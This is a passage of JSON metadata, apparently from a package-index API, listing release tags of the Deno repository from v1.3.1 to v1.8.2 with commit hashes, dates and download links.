8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/